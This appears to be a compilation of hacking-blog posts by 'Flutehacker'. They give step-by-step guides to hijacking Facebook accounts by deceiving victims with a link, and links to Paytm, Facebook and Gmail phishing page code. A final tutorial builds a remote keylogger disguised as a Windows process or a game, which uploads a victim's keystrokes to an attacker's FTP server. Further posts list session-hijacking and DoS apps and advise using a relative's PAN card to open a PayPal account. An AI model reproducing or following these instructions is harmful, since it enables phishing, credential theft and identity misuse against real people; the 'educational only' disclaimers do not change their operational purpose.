Hack facebook via binu
Step 1:- Download Binu For Mobile

step2:-After Then Install It On Your Mobile.

Step 3:-Open The Binu App You Downloaded
Just Now And open it go on SOCIAL and then
Facebook Icon On It Just Click On It Click The
Facebook Icon.

Step 4 :-Then A Windows Will Open. Then
Click On Login Click On Login.

Step 5 :-After Clicking On Login A Browser
Will Be Asked For Opening It You Can Select
AnyOne U Want Any Browser You Want..HERE
Is THE TRICK WHICH IS THE MAIN PART.

Step 6 :-Copy The Link From The Address Bar Of The Browser You Chossen In Previous
Step.And Send It To You Victim Facebook
Account As Message And Tell Them To Open
By Making Them Fool. Here You Need Yours
Mind Soo Use Ur Mind To MAke Them Fool.
Soo When They Open The Linkk There Fb
Account Will Be Opened In You Binu Browser
Just Check There.
.
.flutehacker

PayTm Phishing Script for wapka
Friends Now a Days I got lots off Requests to
Post Paytm phishing Code

So I Make iT And Decided To Share Paytm Pishing Code For All Of You :
Demo

I ThinK Already MoST Pepoles Know How To Make Simple Pishing Page So I Dont Discuss That Think You Can Chek My Previos Post For How To Make Simple FB Pishing Page

Log in Your Wapka Account And Create New SiTe Then Put This Pastbin Code in Wml/XHtml Code

http://pastebin.com/9VJHQGJS

Now You Done Your paytm Pishing Page is Ready To Hack paytm Accounts !!

Note: This iS Only For Educational Praposnal Dont use iT For illegal praposnal I am Not responseble

Enjoy
.
Flutehacker

Hi Everybody.. Hope That You All Are Getting
Safe Tricks & Tutorials From My Blog..
You All Know About Wapka Phishing Sites.
Normally We Create It From Wapka.mobi Site
& Use The WML/XHTML Codes To Perform
The Site..

In My Previous Posts, I Have Mentioned 4-5
Type Facebook Phishing In Different Posts.
In This Post, I Am Sharing Those All Wapka
Facebook WML/XHTML Codes In A Single
Post.

Note => These Type Of Wapka Sites Are Best
Viewed In Mobile Only, You Cant' Perform It
On Your PC or Laptop.

So, Here Are Codes.
I Have Linked These All From Pastebin.
Please Copy It From Raw Paste Data.
Otherwise You Can Face 'SYNTEX ERROR'

1. Normal/Simple/Original Facebook Page
WML/XHTML Code Wapka

http://ww.pastebin.com/vDXXTyie

2. Facebook Autolike Wapka WML/XHTML Code

http://pastebin.com/sQ2kE1Dw

3. Facebook Secure Type WML/XHTML Code

http://www.pastebin.com/6sbrLsBm

4. Gmail Phishing WML/XHTML Code
[Normal]

http://www.pastebin.com/CLDk4Pgc

Important => All Stuffs Are For Educational
Purposes, Please Don't Use It For Fraud Or
Illegal Purposes.

Site Owner Is Not Responsible Form Any
Harm, Caused By These Sites
Hope, You All Will Enjoy It..
.
Flutehacker

Installing and running Kali Linux on your Android device!!

This post is mainly for those hackers out there that are familiar with Linux and that use Linux to perform ” security checks” on things like cracking wep Wi-Fi passwords or cracking security on websites.  This opens the door to doing this from a mobile device such as a phone or a tablet.  This process is possible because android firmware is so similar to Linux. Your device must be rooted and busy box:  http://adf.ly/buzHH must be installed before we start this process.

The process is extremely simple now thanks to this new app named Linux deploy. This app makes it so u don’t have to use the terminal emulator in order to get the Linux os installed and running all you need to do is adjust a couple simple preferences and press start. From there you can use another app called android vnc viewer. So first things first download android deploy http://adf.ly/buz2L

And then androidvnc   http://adf.ly/buzAm

Once u have busy box, androidvnc, and Linux deploy on your rooted device than start up Linux deploy and press the little arrow in the bottom right corner of the screen to open the preferences menu.

In the preferences menu scroll down to distribution and select Kali Linux from the list of Linux os you can install and run from your android device.

Once you select Kali Linux you can select if you want to install Linux on your external sd card or on your internal device’s memory but remember this will use up between four and five gigabytes of space. If you want to install Linux on the external sd card than select installation path and choose the directory you wish to install Kali Linux in. If you have room and decide to install the new os on your internal memory than leave the installation path as it is. It should be set up already for the internal memory of your device.

Once you have the installation path and the distribution of Linux selected than next you need to select GUI preferences to change the screen height and width. If you select the wrong dimensions it can always be changed the next time you start Linux.

Once all these basic settings are set you can select install and start installing Linux to your device. This is a lengthy process because the app has to download the Linux IMG file and decompress and install it. I would advice to be within Wi-Fi before you start. Within Wi-Fi this process usually takes between ten to twenty minutes.

Once this process is finished and it’s installed the last line of code should read end. After installed go back to preferences and select reconfigure. This will take a couple minutes but will configure kali with your device.

Again once it’s finished end will appear in the last line of code on the screen. Then just hit start and Linux is running.

Now that Kali is running you need to bring up the graphical interface to see it. This is where you use androidvnc. Select android vnc viewer and put in these settings. Select new for connection, type anything you want for the nickname, type changeme as the password, and 5900 as port. Now u could use any color settings but the best would be 24-bit. After you fill this out select connect.



After you connect that’s it!! Kali will be up and running!! When your finished just go back to Linux deploy app and select stop..

Flutehacker

Here we have in no particular order the top Android apps for hacking using an android smartphone.

Disclaimer: These apps should be used for research purposes only

1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009.

2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.

3.Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks.

4.Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses.

5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

6. SSHDroid:- SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc).

7. WiFi Analyser:- Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

8. Network Discovery:- Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security.

9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers.

10. dSploit:-Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

11. Hackode:- The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

12.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

13.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

14.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.

15.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.
.

17. AppUse:– Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

18. Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds.
Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.

20.Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload.

21. WifiKill:- Second app, developed also by B.Ponury is an app which can kill connections and kick site-hoggers from the site. This app definitely kick then net user from the site so he cannot use it anymore. The app also offers the list of viewed sites by the hogger.

22. DroidSniff:- Similar to DroidSheep but with a newer and nicer interface is DroidSniff – sniffing app not only for Facebook. This app shows you what is the hogger looking for and then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly.

23. Network Spoofer:- The last app, called NetWork Spoofer is very similar to dSploit but it’s more easier to use. Only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others.

24. Droid SQLI:- allows you to test your MySQL based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: Time based injection, blind injection, error based injection, normal injection.

25. sqlmapchik:- is a cross-platform sqlmap GUI for the extremely popular sqlmap tool

26. Whatsapp viewer:- is a simple forensic tool. It gives the access to whatsapp chat directly from sqlite databases, even from encrypted databases.

27. WhatsAPI:- Is a platform that allows you to send bulk messages through PHP. The script itself is simple..
.
Flutehacker

PAYPAL IS A ONLINE BANK ,WHEN YOU EARN MONEY FROM INTERNET (ONLINE) ,FROM ANY SITE ON INTERNET.YOU HAVE TO TRANSFER MONEY INTO PAYPAL ACCOUNT .AFTER THAT YOU HAVE TO ATTACH YOUR BANK ACCOUNT TO YOUR PAYPAL ACCOUNT AND THEN YOU CAN TRANSFER MONEY FROM YOUR PAYPAL ACCOUNT TO YOUR BANK  ACCOUNT AND WITHDRAW MONEY FROM YOUR ATM

NOTE - TO CREATE PAYPAL ACCOUNT YOU NEED A PAN CARD ONLY.IF YOU DON'T HAVE PAN CARD YOU CAN USE  YOUR PARENTS OR RELATIVE PAN  CARD . HERE IN PAYPAL THERE IS NO ACCOUNT NUMBER , WE USE EMAIL ID IN PLACE OF ACCOUNT NUMBER

                              TO CREATE PAYPAL ACCOUNT FOLLOW  THESE STEPS

STEP 1        GO TO THE SITE    WWW.PAYPAL.COM

STEP 2        CLICK ON SIGN UP BUTTON

STEP 3         SELECT YOUR COUNTRY AND  CHOOSE PERSONAL  AND CLICK ON GET               
                     STARTED

STEP 4        FILL THE FORM NOW................................

                    ENTER YOUR EMAIL ADDRESS

                    CHOOSE  YOUR PASSWORD

                    ENTER SAME PASSWORD AGAIN

                    ENTER YOUR FIRST NAME

                    ENTER MIDDLE NAME   

                    ENTER LAST NAME

                    ENTER YOUR DATE OF BIRTH

                    CHOOSE NATIONALITY (India)

                    ENTER PAN CARD NUMBER

              (IF YOU DON'T HAVE PAN CARD USE YOUR FATHER OR MOTHER OR RELATIVE PAN CARD NUMBER)
              
                   ENTER ADDRESS

                   ENTER CITY

                   ENTER STATE

                   ENTER PIN CODE

                  ENTER YOUR MOBILE NUMBER

             CLICK ON AGREE AND CREATE ACCOUNT

STEP 5      SECURITY CHALLENGE
                  ENTER THE WORDS GIVEN IN THE BOX AND CLICK CONTINUE
              
                  CLICK ON GO TO MY ACCOUNT

STEP 6     CONFIRM YOUR EMAIL ADDRESS
                 OPEN YOUR EMAIL INBOX AND VERIFY YOUR EMAIL ADDRESS
                  ENTER PASSWORD THAT YOU CHOOSE EARLIER
            
STEP 7     CHOOSE SECURITY QUESTION 1
                 GIVE ANSWER
                 CHOOSE SECURITY QUESTION 2
                 GIVE ANSWER
                 CLICK ON SUBMIT
                 CLICK ON CONTINUE
                 CLICK ON GO TO MY ACCOUNT

                CONGRATS YOUR PAYPAL ACCOUNT CREATED SUCCESSFULLY !!!!!!!!!.
.flutehacker

How to Hack Facebook accounts using Remote keylogger and prevention against this attack
In this post i am going discussing about how hackers hack facebook accounts using remote keylogger .
Q) What is a keylogger?
A) A keylogger is a program or software which logs or track the keystrokes by the user and saves them into a file.
Q) Where are keylogs saved?
A) It saves the logs into a text file which is present either in windows directory or in cache memory .
Q) Since it saves logs in the Pc ,do i need physical access to that computer ?
A) Not necessarily ,It depends on the keylogger you are using .
If you are using a remote keylogger you dont need physical access to that computer. The logger will automatically upload the logs to your **FTP SERVER** ,website,email…
Download the Keylogger from this link :
[Unlock it first by Liking/Tweeting/G+]
THIS CONTENT IS LOCKED!
Please support us, use one of the buttons below to unlock the content.
tweet
Tweet
like us
+1 us

Steps:-
1) Download and extract all files [Disable your antivirus while working with these files because it will mark these files as virus and will delete them] .
2) Open FKS 2.0.exe
3) Server name : enter any name you want but it should resemble to something related to windows processes ,something like “csrsss.exe” or “explore.exe”.
4)Reg key : leave it as it is.
5) Remove file: You could enter any weird name.
6) Victim name : enter your victim ‘s name .
7) Get and exec : Leave it as it is.
8) Go to Logging options by clicking on “logging Options” in Left side.
9) Log File Name : Enter your victim ‘s name with a .txt extension
example : Maverick.txt
10) When log gets _____ bytes long, upload it .  : Enter 5000 [You can change it to any number , depending on how frequently you want the files to be uploaded ].
11) Go to “Upload Options” .
12) Enter the Ftp server details accordingly Server host in “ftp server” ,user name in “FTP user” ,password in FTP password and /victimname in “upload dir“.
13) After that click on build server and your keylogger will create a file named server.exe in the keylogger directory i.e. the folder where you extracted the Fks files.
14) Rename server.exe with something cool like “counter strike 1.6” or anything else.
15) Send this file to your Victim . As soon as he executes the file , His logs will be uploaded at your Ftp server.
16) After this open Filezilla and fill yourFtp details.
Then it will show 2 columns one containing your Hard disk data in the right side and other in the left will be your Files in your web hosting account . Download the logs to your pc and Search for email accounts and their passwords.

You will find many other intersting things too in that file like what your victim searches on google , what does he do and almost everything he type on his keyboard !!
Prevention against this type of attack :
>Always use updated antivirus software .
> Download file from trusted links .
> Just for additional security you can scan a file at online scanners such as
novirusthanks .
NOTE:
This tutorial is for educational purposes only,Use at your own risk.
How to hack is not responsible for any type of mishappening caused due to this information!!

Keep visiting How to Hack .
Post your comments and feedback in comments !
Also join us at facebook , twitter and google plus .
.
.flutehacker